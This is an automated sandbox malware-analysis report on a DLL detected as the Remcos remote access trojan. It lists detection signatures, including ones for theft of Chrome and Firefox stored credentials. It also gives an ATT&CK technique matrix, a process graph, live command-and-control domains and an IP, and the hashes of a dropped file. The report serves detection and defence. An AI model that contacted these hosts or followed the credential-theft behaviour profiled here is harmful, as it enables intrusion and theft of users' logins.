              Source: C:\Windows\SysWOW64\rundll32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_02B0BA12
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_02A0BA12
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: \key3.db12_2_02B0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: \key3.db15_2_02A0BB30

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: cmd.exe12_2_02B0569A
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: cmd.exe15_2_02A0569A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              Windows Service              		1
              Bypass User Account Control              		2
              Obfuscated Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		2
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		11
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		1
              DLL Side-Loading              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Windows Service              		1
              Bypass User Account Control              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script222
              Process Injection              		1
              Masquerading              		LSA Secrets22
              System Information Discovery              		SSHKeylogging11
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		Cached Domain Credentials12
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Virtualization/Sandbox Evasion              		DCSync1
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
              Process Injection              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Regsvr32              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Rundll32              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536945 Sample: 7P7cuKWTfN.dll Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 58 goatratedman.com 2->58 60 extendedbreakfast.com 2->60 74 Suricata IDS alerts for network traffic 2->74 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 9 other signatures 2->80 10 loaddll32.exe 1 2->10         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 cmd.exe 1 10->16         started        18 regsvr32.exe 10->18         started        21 rundll32.exe 10->21         started        27 3 other processes 10->27 23 rundll32.exe 12->23         started        25 rundll32.exe 14->25         started        signatures6 29 rundll32.exe 1 16->29         started        64 Contains functionality to bypass UAC (CMSTPLUA) 18->64 66 Contains functionalty to change the wallpaper 18->66 68 Contains functionality to steal Chrome passwords or cookies 18->68 72 2 other signatures 18->72 33 regsvr32.exe 18->33         started        70 Injects a PE file into a foreign processes 21->70 35 rundll32.exe 21->35         started        37 rundll32.exe 23->37         started        39 rundll32.exe 25->39         started        41 rundll32.exe 27->41         started        43 rundll32.exe 27->43         started        process7 file8 56 C:\Users\user\AppData\Roaming\VIVA_01.dll, PE32 29->56 dropped 84 Contains functionality to bypass UAC (CMSTPLUA) 29->84 86 Contains functionalty to change the wallpaper 29->86 88 Contains functionality to steal Chrome passwords or cookies 29->88 90 4 other signatures 29->90 45 rundll32.exe 3 29->45         started        49 cmd.exe 1 29->49         started        signatures9 process10 dnsIp11 62 extendedbreakfast.com 193.233.18.18, 4050, 49735, 49737 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 45->62 92 System process connects to network (likely due to code injection or exploit) 45->92 51 reg.exe 1 1 49->51         started        54 conhost.exe 49->54         started        signatures12 process13 signatures14 82 Creates autostart registry keys with suspicious names 51->82

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              7P7cuKWTfN.dll47%ReversingLabsWin32.Backdoor.Remcos
              7P7cuKWTfN.dll100%AviraTR/AVI.Remcos.yqazi

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\VIVA_01.dll100%AviraTR/AVI.Remcos.yqazi
              C:\Users\user\AppData\Roaming\VIVA_01.dll47%ReversingLabsWin32.Backdoor.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://www.openssl.org/support/faq.html0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              goatratedman.com
              		193.233.18.18
              		truetrue
                		unknown
                extendedbreakfast.com
                		193.233.18.18
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  goatratedman.comtrue
                    		unknown
                    extendedbreakfast.comtrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gprundll32.exe, regsvr32.exefalse
                      • URL Reputation: safe
                      		unknown
                      http://www.openssl.org/support/faq.html.....................loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                        		unknown
                        http://geoplugin.net/json.gp/Cloaddll32.exe, 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.vidsoft.de/xmlns/meetingcontrolprotocolrundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                          		unknown
                          http://www.gotomeeting.comInetAPI::initializeForG2M()InetAPI::shutdown()..loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                            		unknown
                            http://support.gotomeeting.com/ics/support/default.asp?deptID=5641&task=knowledge&questionID=4517Lealoaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                              		unknown
                              http://www.openssl.org/support/faq.htmlloaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.gotomeeting.comhttps://www.gotowebinar.comhttps://www.gototraining.comhwIdloaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                193.233.18.18
                                		goatratedman.comRussian Federation
                                		8749REDCOM-ASRedcomKhabarovskRussiaRUtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1536945
                                Start date and time:2024-10-18 12:13:19 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 22s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:7P7cuKWTfN.dll
                                renamed because original name is a hash value
                                Original Sample Name:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0.dll
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winDLL@40/1@2/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 40
                                • Number of non-executed functions: 363
                                Cookbook Comments:
                                • Found application associated with file extension: .dll
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • VT rate limit hit for: 7P7cuKWTfN.dll

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                06:15:37API Interceptor3517504x Sleep call for process: rundll32.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                REDCOM-ASRedcomKhabarovskRussiaRUyQjt1fG5M5.exeGet hashmaliciousUnknownBrowse
                                • 193.233.22.45
                                yQjt1fG5M5.exeGet hashmaliciousUnknownBrowse
                                • 193.233.22.45
                                botnt.arm7.elfGet hashmaliciousUnknownBrowse
                                • 95.85.78.2
                                botnt.arm.elfGet hashmaliciousUnknownBrowse
                                • 95.85.78.19
                                pWf4oPGBv2.elfGet hashmaliciousMiraiBrowse
                                • 212.19.0.216
                                qCgtVyWfS6.elfGet hashmaliciousMiraiBrowse
                                • 212.19.0.214
                                OVaDIUarkm.exeGet hashmaliciousAmadey, Healer AV Disabler, RedLineBrowse
                                • 193.233.20.14
                                ekevL8v2mi.exeGet hashmaliciousAmadey, Healer AV Disabler, RedLineBrowse
                                • 193.233.20.14
                                vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
                                • 212.19.25.242
                                flB6ygLzMc.elfGet hashmaliciousMiraiBrowse
                                • 212.19.0.220

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Roaming\VIVA_01.dll

                                Download File
                                Process:C:\Windows\SysWOW64\rundll32.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15798272
                                Entropy (8bit):6.844423960721825
                                Encrypted:false
                                SSDEEP:196608:i0ivGTAslgbSYBsnBho/wnBvq+4rMOblxz6qYFS1qY2aubxi58/EUxFFVsmN:izvfaEog+4rdbUTFVRN
                                MD5:6D5A39FFB948CE7FF8744E302201F711
                                SHA1:AF806FEEB69690F4963EAA146C1DEBB67A45895D
                                SHA-256:8E521953F01B56F163A5D7CA777CDBEF86F1D9291BF994D3BA35CB0E89729DA0
                                SHA-512:BC2869463865C220800279CD4973633DAEDA05484FCF172AC4C5750EB7E215B88DFFA195E51AAFDF4193A5F5D182859966D70D1E1FCD3B6BD6A3F5D0663F0B00
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 47%
                                Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$...........X.s.X.s.X.s...[.s.F...P.s.]...[.s.n.x.Z.s...y...s...y.U.s...x.u.s.....Q.s...,.L.s..<....s.Q...I.s.].,...s..<....s..<..q.s.X.s...s.Q....s.X.r.-.s..<..i.s.Q...H.s.Q.....s.Q..Y.s.F..Y.s.Q..Y.s.RichX.s.........PE..L......N...........!.....&....2......&......@.......................................h....@......................... .......@............x........... ..x............Z......................Dy.......................@.......m.......................text.... .......................... ..`.orpc........0.......".............. ..`.rdata....#..@...~#..*..............@..@.data...............................@....tls.........p......................@....rsrc....x.......z..................@..@........................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.844423960721825
                                TrID:
                                • Win32 Dynamic Link Library (generic) (1002004/3) 95.65%
                                • Win32 EXE PECompact compressed (generic) (41571/9) 3.97%
                                • Generic Win/DOS Executable (2004/3) 0.19%
                                • DOS Executable Generic (2002/1) 0.19%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:7P7cuKWTfN.dll
                                File size:15'798'272 bytes
